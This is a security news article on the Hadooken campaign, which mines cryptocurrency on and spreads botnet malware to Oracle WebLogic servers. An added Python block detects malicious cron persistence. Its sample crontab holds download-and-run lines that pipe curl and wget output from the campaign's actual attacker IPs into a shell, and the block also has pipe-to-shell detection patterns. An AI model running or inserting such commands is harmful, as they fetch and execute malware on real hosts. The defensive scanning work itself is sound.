
Linux malware campaign targets Oracle WebLogic in a bid to mine cryptocurrency


Cybersecurity researchers have identified a new malware campaign targeting Linux systems to carry out unauthorized cryptocurrency mining and deliver botnet malware.

The campaign, which specifically targets Oracle WebLogic servers, delivers a malware strain known as Hadooken, according to cloud security firm Aqua.

“When Hadooken is executed, it drops Tsunami malware and initiates a crypto miner,” explained security researcher Assaf Morag.

The attack exploits known vulnerabilities and misconfigurations, such as weak credentials, to gain an initial foothold and execute arbitrary code on vulnerable instances.

Two nearly identical payloads—one in Python and the other as a shell script—are used to retrieve the Hadooken malware from remote servers (“89.185.85[.]102” or “185.174.136[.]204”).

Additionally, the shell script variant scans various directories containing SSH data (like user credentials, host details, and secrets) to attack known servers, Morag added.

“It then moves laterally across the organization or connected systems, further propagating the Hadooken malware.”

New Linux Malware

Key components

Hadooken contains two key components:

  • a cryptocurrency miner
  • a distributed denial-of-service (DDoS) botnet known as Tsunami (also referred to as Kaiten), which has previously targeted Jenkins and WebLogic services running in Kubernetes clusters.

The malware also establishes persistence on the host by setting up cron jobs to periodically trigger the crypto miner at different intervals.

According to Aqua, the IP address 89.185.85[.]102, registered in Germany under the hosting provider Aeza International LTD (AS210644), has been linked to an 8220 Gang cryptocurrency campaign, previously reported by Uptycs in February 2024. This campaign exploited vulnerabilities in Apache Log4j and Atlassian Confluence Server and Data Center.

The second IP address, 185.174.136[.]204, while currently inactive, is also connected to Aeza Group Ltd. (AS216246). Reports from Qurium and EU DisinfoLab in July 2024 revealed that Aeza is a bulletproof hosting service with operations in Moscow M9 and two data centers in Frankfurt.
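The two paragraphs above give the campaign's download servers, and the earlier paragraph describes persistence through cron jobs that periodically relaunch the miner. The following Python script is an added example, not code from the article or from Aqua: it parses crontab-format text and flags entries that reference the two IP addresses named above or that show generic download-and-execute or tmp-directory execution patterns. The heuristics and the sample crontab are constructed here for illustration; only the two IP addresses come from the article.

```python
import re

# IoCs quoted in the article above (printed defanged there as "[.]"; refanged for matching).
HADOOKEN_IOC_IPS = {"89.185.85.102", "185.174.136.204"}

# Generic persistence heuristics (assumption: chosen for this example, not signatures
# taken from the Aqua report).
FETCH_PIPE_SHELL_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
TMP_EXEC_RE = re.compile(r"(?:/tmp|/dev/shm|/var/tmp)/\S+")
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")

# Constructed sample crontab, not a real capture. Line 2 and line 5 reference the
# article's IoC IPs; line 4 uses an "@reboot" shortcut schedule.
SAMPLE_CRONTAB = """\
# constructed sample crontab for the example
*/5 * * * * curl -s http://89.185.85.102/x | sh
0 3 * * * /usr/bin/backup.sh
@reboot /tmp/.c/miner
*/10 * * * * wget -qO- http://185.174.136.204/y | bash
"""


def parse_cron_line(line):
    """Split one crontab line into (schedule, command).

    Returns None for blank lines and comments. Handles both the five-field
    schedule and the "@reboot"/"@daily" shortcut forms.
    """
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    if stripped.startswith("@"):
        parts = stripped.split(None, 1)
        if len(parts) < 2:
            return None
        return {"schedule": parts[0], "command": parts[1]}
    parts = stripped.split(None, 5)
    if len(parts) < 6:
        return None
    return {"schedule": " ".join(parts[:5]), "command": parts[5]}


def assess_cron_entry(entry):
    """Return a list of human-readable findings for one parsed crontab entry."""
    findings = []
    cmd = entry["command"]
    for ip in IPV4_RE.findall(cmd):
        if ip in HADOOKEN_IOC_IPS:
            findings.append(f"references known Hadooken IoC {ip}")
    if FETCH_PIPE_SHELL_RE.search(cmd):
        findings.append("downloads content and pipes it to a shell")
    if TMP_EXEC_RE.search(cmd):
        findings.append("executes a file from a world-writable tmp directory")
    return findings


def scan_crontab(text):
    """Scan crontab-format text; return only the entries that produced findings."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = parse_cron_line(line)
        if entry is None:
            continue
        findings = assess_cron_entry(entry)
        if findings:
            hits.append({"line": lineno, **entry, "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {hit['line']} [{hit['schedule']}] {hit['command']}")
        for f in hit["findings"]:
            print(f"    - {f}")
```

On a real host the same function can be fed the output of `crontab -l` for each user, `/etc/crontab`, and the files under `/etc/cron.d`; a hit on one of the two IoC addresses is a strong signal, while the tmp-directory and pipe-to-shell heuristics are weaker and need review against the host's legitimate jobs.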

“Aeza’s rapid growth can be attributed to its recruitment of young developers associated with Russian bulletproof hosting providers, offering a safe haven for cybercrime activities,” the researchers concluded.

Source: TheHackerNews
